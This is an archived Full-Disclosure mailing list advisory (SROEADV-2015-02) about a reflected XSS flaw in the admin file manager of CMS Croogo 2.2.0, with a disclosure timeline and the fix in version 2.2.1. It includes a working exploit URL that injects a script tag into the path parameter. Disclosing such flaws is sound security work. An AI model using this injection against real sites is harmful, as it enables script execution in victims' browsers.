lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CALH-=7wOCPe6i4Ud0a1f=LowM28ad2=rYxu=Bi8i1Ju=k-w4NQ@mail.gmail.com>
Date: Mon, 12 Jan 2015 06:05:49 +0100
From: Steffen Rösemann <steffen.roesemann1986@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Reflecting XSS vulnerability in CMS Croogo v.2.2.0

Advisory: Reflecting XSS vulnerability in CMS Croogo v.2.2.0
Advisory ID: SROEADV-2015-02
Author: Steffen Rösemann
Affected Software: CMS Croogo v.2.20
Vendor URL: https://croogo.org
Vendor Status: solved
CVE-ID: -

==========================
Vulnerability Description:
==========================

The filemanager functionality in the administrative backend of CMS Croogo
v. 2.2.0 is prone to reflecting XSS attacks.

==================
Technical Details:
==================

The filemanager of a common Croogo installation is located here:

http://
{TARGET}/admin/file_manager/file_manager/editfile?path=%2FApplications%2FXAMPP%2Fxamppfiles%2Fhtdocs%2Fcroogo-2.2.0%2Fpackage.json

By appending arbitrary HTML- and/or JavaScriptcode to existing filenames,
it gets rendered in the generated webpage. It seems not to be working by
appending code to existing directory names.

Exploit-Example:

http://{TARGET}/admin/file_manager/file_manager/editfile?path=%2FApplications%2FXAMPP%2Fxamppfiles%2Fhtdocs%2Fcroogo-2.2.0%2Fpackage.json<script>alert("XSS
in filemanager functionality of CMS Croogo 2.2.0")</script><!--

=========
Solution:
=========

Update to Croogo v.2.2.1.


====================
Disclosure Timeline:
====================

03-Jan-2015 – found the vulnerability
03-Jan-2015 - informed the developers by opening an issue on Github (see
https://github.com/croogo/croogo/issues/599)
03-Jan-2015 – release date of this security advisory [without technical
details]
12-Jan-2015 - fix by vendor (v. 2.2.1)
12-Jan-2015 - release date of this security advisory
12-Jan-2015 - send to lists


========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] https://croogo.org
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-02.html
[3] https://github.com/croogo/croogo/issues/599
[4]
http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-02.html

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists